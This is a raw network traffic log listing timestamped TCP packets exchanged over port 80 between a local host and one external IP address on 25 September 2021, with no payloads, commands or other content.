Sep 25, 2021 10:15:03.990031004 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990034103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990044117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990071058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990097046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990107059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990112066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990123034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990154982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990159988 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990163088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990185022 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990216970 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990221024 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990223885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990246058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990271091 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990283012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990287066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990297079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990324020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990341902 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990345955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990356922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990382910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990397930 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990403891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990410089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990442038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990451097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990453959 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990470886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990495920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990506887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990509987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990521908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990549088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990561962 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990566969 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990573883 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990600109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990612984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990617990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990626097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990658045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990667105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990670919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990686893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990711927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990724087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990727901 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990737915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990763903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990773916 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990777016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990788937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990814924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990828037 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990832090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990842104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990875006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990884066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990886927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990904093 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990930080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990943909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990947962 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990956068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990982056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.990992069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.990995884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991007090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991034031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991044998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991048098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991060019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991091967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991101027 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991105080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991157055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991188049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991209030 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991213083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991214991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991242886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991254091 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991255999 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991277933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991314888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991323948 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991327047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991345882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991372108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991384029 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991389036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991404057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991432905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991445065 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991449118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991458893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991483927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991497040 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991498947 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991509914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991534948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991548061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991554022 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991560936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991586924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991595984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991599083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991619110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991647005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991655111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991660118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991672039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991698027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991708994 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991713047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991723061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991749048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991765022 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991767883 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991775036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991801977 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991816998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991821051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991841078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991843939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991878986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991916895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.991920948 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991925001 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991978884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.991993904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992036104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992072105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992083073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992084980 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992105007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992135048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992144108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992191076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992196083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992218018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992269993 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992270947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992275000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992299080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992325068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992337942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992341042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992350101 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992376089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992389917 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992396116 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992400885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992433071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992441893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992444992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992461920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992486954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992502928 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992506027 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992513895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992541075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992551088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992554903 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992566109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992593050 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992604971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992608070 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992618084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992650032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992659092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992664099 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992679119 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992703915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992719889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992724895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992729902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992768049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992774010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992778063 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992803097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992841959 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992851973 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992857933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992878914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.992919922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.992924929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.993988037 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.996068954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.996139050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997255087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997287035 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997313023 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997339010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997348070 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997354984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997371912 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997389078 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997394085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997400999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.997443914 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.997447014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.011835098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.014969110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015075922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015124083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015139103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015206099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015268087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015292883 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015305996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015316963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015362024 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015384912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015400887 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015439987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015443087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015443087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015482903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015485048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015532017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015568018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015572071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015572071 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015610933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015646935 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015659094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015659094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015698910 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015701056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015738964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015777111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015778065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015782118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015815973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015853882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015856028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015861034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015891075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015928984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.015930891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015935898 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.015975952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.016019106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.016022921 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.016027927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.016056061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.016073942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.016096115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.016140938 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.016144991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017314911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017360926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017400026 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017401934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017436981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017447948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017453909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017489910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017518997 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017529964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017540932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017569065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017601013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017633915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017673016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017703056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017707109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017725945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017741919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017744064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017781973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017823935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017837048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017842054 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017864943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017879009 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.017903090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017942905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.017981052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018028975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018062115 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018073082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018076897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018080950 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018084049 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018086910 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018111944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018116951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018166065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018170118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018204927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018244028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018245935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018249035 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018285990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018325090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018328905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018335104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018374920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018418074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018419027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018424034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018457890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018495083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018496037 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018500090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018534899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018573046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018579006 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018587112 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018615007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018626928 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018654108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018692970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018699884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018702984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018744946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018783092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018785000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018790007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018821001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018831015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018862009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018899918 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018939018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:04.018956900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018966913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:04.018971920 CEST	49744	80	192.168.2.5	159.69.203.58
